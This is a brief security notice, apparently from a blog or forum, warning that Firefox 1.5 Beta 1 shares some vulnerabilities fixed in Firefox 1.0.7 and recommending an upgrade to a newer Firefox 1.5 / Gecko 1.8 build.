Firefox 1.5 Beta 1 is vulnerable to some of the holes fixed in Firefox 1.0.7. You should upgrade to a newer build from the Firefox 1.5 / Gecko 1.8 branch, preferably today's.